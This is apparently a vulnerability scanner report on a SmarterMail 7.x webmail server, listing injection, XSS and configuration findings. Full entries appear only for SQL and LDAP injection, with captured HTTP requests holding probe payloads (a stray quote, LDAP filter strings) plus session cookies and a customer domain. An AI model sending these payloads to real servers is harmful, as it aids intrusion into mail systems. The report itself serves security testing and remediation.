Default Installation, XSS, Stored Cross Site Scripting, SmarterMail Version 7.x, SmarterTools Web Server

1. SQL injection

2. LDAP injection

2.1. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmCalendar.aspx [SelectedLanguage cookie]

2.2. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmEmptyPreviewOuter.aspx [type parameter]

3. Cross-site scripting (stored)

4. Cross-site scripting (reflected)

4.1. http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx [ctl00%24Split%24LP%24SessionKey parameter]

4.2. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmStoredFiles.aspx [path parameter]

4.3. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmStoredFiles.aspx [path parameter]

4.4. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmStoredFiles.aspx [path parameter]

5. Cleartext submission of password

5.1. http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx

5.2. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmChangePasswordWizard.aspx

5.3. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmMySettings.aspx

5.4. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmSmtpAccount.aspx

6. Session token in URL

7. Password field with autocomplete enabled

7.1. http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx

7.2. http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx

7.3. http://vulnerable.SmarterMail 7.x.host:9998/login.aspx

8. Cross-domain Referer leakage

8.1. http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx

8.2. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmPrintPreview.aspx

8.3. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx

8.4. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx

8.5. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx

8.6. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx

8.7. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx

8.8. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx

8.9. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx

8.10. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmAddReportItem.aspx

8.11. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmHelp.aspx

9. Cross-domain script include

10. Cookie without HttpOnly flag set

10.1. http://vulnerable.SmarterMail 7.x.host:9998/

10.2. http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx

10.3. http://vulnerable.SmarterMail 7.x.host:9998/Logout.aspx

10.4. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmDeviceSync.aspx

11. File upload functionality

12. Directory listing

12.1. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/

12.2. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/

12.3. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/

12.4. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/BrowserOverrides/

12.5. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Error/

12.6. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/FileDownload/

12.7. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/GettingStarted/

12.8. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Login/

12.9. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Mail/

12.10. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Main/

12.11. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Popup/

12.12. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Portal/

12.13. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Print/

12.14. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Reporting/

12.15. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Stats/

12.16. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Wizard/

12.17. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/

12.18. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Calendar/

12.19. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Calendar/Img/

12.20. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Combobox/

12.21. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Common/

12.22. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Editor/

12.23. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Editor/Img/

12.24. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Grid/

12.25. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Input/

12.26. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Spell/

12.27. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Spell/Img/

12.28. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/TabStrip/

12.29. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/TabStrip/Img/

12.30. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Toolbar/

12.31. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Toolbar/Img/

12.32. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Window/

12.33. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Window/CssImg/

12.34. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Window/Img/

12.35. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Flash/

12.36. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/

12.37. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/16x16/

12.38. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Customer/

12.39. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Customer/Pager/

12.40. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Icons/

12.41. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Icons/IconMenuStats/

12.42. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Icons/MessageView/

12.43. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Icons/MessageView/rollover/

12.44. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Invitations/

12.45. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Invitations/Button/

12.46. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Misc/

12.47. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Pager/

12.48. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Plupload/

12.49. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Skin/

12.50. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Stats/

12.51. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/social_icons/

12.52. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Javascript/

12.53. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Sounds/

12.54. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/images/icons/dragdrop/

12.55. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/images/icons/iconmenu/

12.56. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/images/misc/tree/

12.57. http://vulnerable.SmarterMail 7.x.host:9998/MailProcessing/

12.58. http://vulnerable.SmarterMail 7.x.host:9998/Main/

12.59. http://vulnerable.SmarterMail 7.x.host:9998/Main/Alerts/

12.60. http://vulnerable.SmarterMail 7.x.host:9998/Main/Calendar/

12.61. http://vulnerable.SmarterMail 7.x.host:9998/Main/Sharing/

12.62. http://vulnerable.SmarterMail 7.x.host:9998/Reports/

12.63. http://vulnerable.SmarterMail 7.x.host:9998/Reports/Controls/

12.64. http://vulnerable.SmarterMail 7.x.host:9998/Services/

12.65. http://vulnerable.SmarterMail 7.x.host:9998/SystemAdmin/

12.66. http://vulnerable.SmarterMail 7.x.host:9998/SystemAdmin/GettingStarted/

12.67. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/

12.68. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Calendar/

12.69. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/PanelBarTemplates/

12.70. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/

12.71. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/ThirdPartyComponents/

12.72. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/TodayPageTemplates/

13. Email addresses disclosed

13.1. http://vulnerable.SmarterMail 7.x.host:9998/

13.2. http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx

13.3. http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx

13.4. http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx

13.5. http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx

13.6. http://vulnerable.SmarterMail 7.x.host:9998/Main/Alerts/frmAlert.aspx

13.7. http://vulnerable.SmarterMail 7.x.host:9998/Main/Calendar/frmEvent.aspx

13.8. http://vulnerable.SmarterMail 7.x.host:9998/Main/Calendar/frmEvent.aspx

13.9. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmAutocomplete.aspx

13.10. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmGAL.aspx

13.11. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmMySettings.aspx

13.12. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx

13.13. http://vulnerable.SmarterMail 7.x.host:9998/SystemAdmin/JavaScriptFlashGateway.js

13.14. http://vulnerable.SmarterMail 7.x.host:9998/SystemAdmin/JavaScriptFlashGatewayHttps.js

14. HTML does not specify charset

15. Content type incorrectly stated

15.1. http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx

15.2. http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx

15.3. http://vulnerable.SmarterMail 7.x.host:9998/Main/Calendar/frmEvent.aspx

15.4. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmAddFileStorageFolder.aspx

15.5. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmDeviceSync.aspx

15.6. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/ThirdPartyComponents/PluploadReceiver.aspx

16. Content type is not specified

16.1. http://vulnerable.SmarterMail 7.x.host:9998//

16.2. http://vulnerable.SmarterMail 7.x.host:9998//Main/

16.3. http://vulnerable.SmarterMail 7.x.host:9998//Main/frmEmptyPreviewOuter.aspx

16.4. http://vulnerable.SmarterMail 7.x.host:9998//Main/frmStoredFiles.aspx

16.5. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/ButtonBarIcons.xml

16.6. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Skin.xml

16.7. http://vulnerable.SmarterMail 7.x.host:9998/Main/Alerts/frmAlert.aspx

16.8. http://vulnerable.SmarterMail 7.x.host:9998/Main/Alerts/frmAlertPopup.aspx

16.9. http://vulnerable.SmarterMail 7.x.host:9998/Main/Calendar/frmEvent.aspx

16.10. http://vulnerable.SmarterMail 7.x.host:9998/Main/Calendar/frmOverview.aspx

16.11. http://vulnerable.SmarterMail 7.x.host:9998/Main/Calendar/javascript:OpenMasterCategoriesPopup()

16.12. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmAdvancedSearchResults.aspx

16.13. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmCalendar.aspx

16.14. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmCalendarSettings.aspx

16.15. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmCompose.aspx

16.16. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmContact.aspx

16.17. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmContentFilters.aspx

16.18. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmFolderAutoClean.aspx

16.19. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmMessage.aspx

16.20. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmMyAutoResponder.aspx

16.21. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmMyInfo.aspx

16.22. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmNote.aspx

16.23. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmSignature.aspx

16.24. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmSignatures.aspx

16.25. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmSpamOptions.aspx

16.26. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmSyncMLList.aspx

16.27. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmTask.aspx

16.28. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmWelcome.aspx

16.29. http://vulnerable.SmarterMail 7.x.host:9998/Main/javascript:OpenMasterCategoriesPopup()

16.30. http://vulnerable.SmarterMail 7.x.host:9998/Main/javascript:parent.OpenNewMessage('/

16.31. http://vulnerable.SmarterMail 7.x.host:9998/Main/javascript:parent.OpenNewMessage('/Main/

16.32. http://vulnerable.SmarterMail 7.x.host:9998/Main/javascript:parent.OpenNewMessage('/Main/frmCompose.aspx',%20800,%20600)

16.33. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmEditCustomReport.aspx

16.34. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx

16.35. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmAddFileStorageFolder.aspx

16.36. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmDeviceSync.aspx

16.37. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmGridSetup.aspx

16.38. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/javascript:ClosePopup()

16.39. http://vulnerable.SmarterMail 7.x.host:9998/http:/

16.40. http://vulnerable.SmarterMail 7.x.host:9998/http:/www.smartertools.com/

16.41. http://vulnerable.SmarterMail 7.x.host:9998/http:/www.smartertools.com/Help/

16.42. http://vulnerable.SmarterMail 7.x.host:9998/http:/www.smartertools.com/Help/SmarterMail/

16.43. http://vulnerable.SmarterMail 7.x.host:9998/http:/www.smartertools.com/Help/SmarterMail/v7/

16.44. http://vulnerable.SmarterMail 7.x.host:9998/http:/www.smartertools.com/Help/SmarterMail/v7/Default.aspx



1. SQL injection  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Default.aspx

Issue detail

The __EVENTTARGET parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __EVENTTARGET parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

Request 1

POST /Default.aspx HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx#
x-microsoftajax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserRSS"}
Content-Length: 1097

ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24Split%24LP%24lnkUpdate&ctl00_Split_LP_ctl01_menuNotesSourceTitle_menuNotesSource_menuSourceSelf_CB=on&ctl00_Split_LP_ctl01_menuNotes_menuCNotesV
...[SNIP]...
tl00%24Split%24LP%24SessionKey=64620560dff748d598e0b5f7f834d342&ctl00%24PageTitle=Notes%20-%20hoytllc.com%20-%20SmarterMail&ctl00%24PanelLoadedState=%7B%7D&__EVENTTARGET=ctl00%24Split%24LP%24lnkUpdate'&__EVENTARGUMENT=UserRSS%7C%2FMain%2FfrmRSSList.aspx&__VIEWSTATE=%2FwEPDwUKLTcwODg1MTE2Ng8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlZBgBBR1jdGwwMCRTcGxpdCRMUCRjdGwwMSRncmROb3Rlcw8FJFRydWV8V
...[SNIP]...

Response 1

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 23:01:53 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/plain; charset=utf-8
Content-Length: 60
Connection: Close

42|pageRedirect||/frmError.aspx?aspxerrorpath=/Default.aspx|

Request 2

POST /Default.aspx HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx#
x-microsoftajax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserRSS"}
Content-Length: 1097

ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24Split%24LP%24lnkUpdate&ctl00_Split_LP_ctl01_menuNotesSourceTitle_menuNotesSource_menuSourceSelf_CB=on&ctl00_Split_LP_ctl01_menuNotes_menuCNotesV
...[SNIP]...
tl00%24Split%24LP%24SessionKey=64620560dff748d598e0b5f7f834d342&ctl00%24PageTitle=Notes%20-%20hoytllc.com%20-%20SmarterMail&ctl00%24PanelLoadedState=%7B%7D&__EVENTTARGET=ctl00%24Split%24LP%24lnkUpdate''&__EVENTARGUMENT=UserRSS%7C%2FMain%2FfrmRSSList.aspx&__VIEWSTATE=%2FwEPDwUKLTcwODg1MTE2Ng8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlZBgBBR1jdGwwMCRTcGxpdCRMUCRjdGwwMSRncmROb3Rlcw8FJFRydWV8V
...[SNIP]...

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 23:02:05 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 10810

5453|updatePanel|ctl00_Split_LP_StyledUpdatePanel1|
                   
<div class="PageTitle" id="SectionHeader">
   <div class="RoundedPageTitleLeft">
       <div class="RoundedPageTitleRight">
           <div id="SectionH
...[SNIP]...

2. LDAP injection  previous  next
There are 2 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.


2.1. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmCalendar.aspx [SelectedLanguage cookie]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmCalendar.aspx

Issue detail

The SelectedLanguage cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the SelectedLanguage cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /Main/frmCalendar.aspx HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=*)(sn=*; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserContacts"}

Response 1

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sat, 02 Oct 2010 02:24:17 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 51079


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   My Calendar - hoytllc.co
...[SNIP]...
<li class='hmItem hmFirst' id='ctl00_BPH_menuCalendar_menuGlobalNew_91202504098d483eaee1242b38954f3d' style='z-index: 800'><a class='hmA' href='#'>New Message</a></li>
           <li class='hmItem' id='ctl00_BPH_menuCalendar_menuGlobalNew_753d658349264406a705548fa1184232' style='z-index: 800'><a class='hmA' href='#'>New Contact</a></li>
           <li class='hmItem' id='ctl00_BPH_menuCalendar_menuGlobalNew_ff4c46d141194844a43a018e642ebe86' style='z-index: 800'><a class='hmA' href='#'>New Appointment</a></li>
           <li class='hmItem' id='ctl00_BPH_menuCalendar_menuGlobalNew_cb7cc438172042d58e5e4a95d3ef5cd6' style='z-index: 800'><a class='hmA' href='#'>New Task</a></li>
           <li class='hmItem hmLast' id='ctl00_BPH_menuCalendar_menuGlobalNew_4060678167324376a5693035e9925b53' style='z-index: 800'><a class='hmA' href='#'>New Note</a></li>
       </ul><div class='hmScrollDown'></div></div>
       </li>
       <li class='hmItem' id='ctl00_BPH_menuCalendar_menuCalendarActions' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>Actions<span class='hmArrow'></span></a>
       <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
           <li class='hmItem hmFirst hmLast' id='ctl00_BPH_menuCalendar_menuCalendarActions_menuAddToOutlook' style='z-index: 800'><a class='hmA' href='#'>Add to Outlook</a></li>
       </ul><div class='hmScrollDown'></div></div>
       </li>
       <li class='hmItem hmLast' id='ctl00_BPH_menuCalendar_menuCalView' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>View<span class='hmArrow'></span></a>
       <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
           <li class='hmItem hmFirst' id='ctl00_BPH_menuCalendar_menuCalView_menuCalFilter' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>Filter<span class='hmArrow'></span></a>
           <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
               <li class='hmItem hmFirst hmCheckable hmChecked' id='ctl00_BPH_menuCalendar_menuCalView_menuCalFilter_menuCalFilterRecurring' style='z-index: 800'><a class='hmA' href='#'><div clas
...[SNIP]...

Request 2

GET /Main/frmCalendar.aspx HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=*)!(sn=*; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserContacts"}

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sat, 02 Oct 2010 02:24:17 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 51043


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   My Calendar - hoytllc.co
...[SNIP]...
<li class='hmItem hmFirst' id='ctl00_BPH_menuCalendar_menuGlobalNew_83b04df32dfc4cebbcba6ab10a5f7bcc' style='z-index: 800'><a class='hmA' href='#'>New Message</a></li>
           <li class='hmItem' id='ctl00_BPH_menuCalendar_menuGlobalNew_5a3e4358b371445d9ae56954d7daf93e' style='z-index: 800'><a class='hmA' href='#'>New Contact</a></li>
           <li class='hmItem' id='ctl00_BPH_menuCalendar_menuGlobalNew_946ef07ab93540419efdcc4b63834080' style='z-index: 800'><a class='hmA' href='#'>New Appointment</a></li>
           <li class='hmItem' id='ctl00_BPH_menuCalendar_menuGlobalNew_d704bfab3e624d308ec0a92db1ae38b9' style='z-index: 800'><a class='hmA' href='#'>New Task</a></li>
           <li class='hmItem hmLast' id='ctl00_BPH_menuCalendar_menuGlobalNew_9e4f4e5d398c425794c0a9889b29dae2' style='z-index: 800'><a class='hmA' href='#'>New Note</a></li>
       </ul><div class='hmScrollDown'></div></div>
       </li>
       <li class='hmItem' id='ctl00_BPH_menuCalendar_menuCalendarActions' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>Actions<span class='hmArrow'></span></a>
       <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
           <li class='hmItem hmFirst hmLast' id='ctl00_BPH_menuCalendar_menuCalendarActions_menuAddToOutlook' style='z-index: 800'><a class='hmA' href='#'>Add to Outlook</a></li>
       </ul><div class='hmScrollDown'></div></div>
       </li>
       <li class='hmItem hmLast' id='ctl00_BPH_menuCalendar_menuCalView' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>View<span class='hmArrow'></span></a>
       <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
           <li class='hmItem hmFirst' id='ctl00_BPH_menuCalendar_menuCalView_menuCalFilter' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>Filter<span class='hmArrow'></span></a>
           <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
               <li class='hmItem hmFirst hmCheckable hmChecked' id='ctl00_BPH_menuCalendar_menuCalView_menuCalFilter_menuCalFilterRecurring' style='z-index: 800'><a class='hmA' href='#'><div clas
...[SNIP]...

2.2. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmEmptyPreviewOuter.aspx [type parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmEmptyPreviewOuter.aspx

Issue detail

The type parameter appears to be vulnerable to LDAP injection attacks.

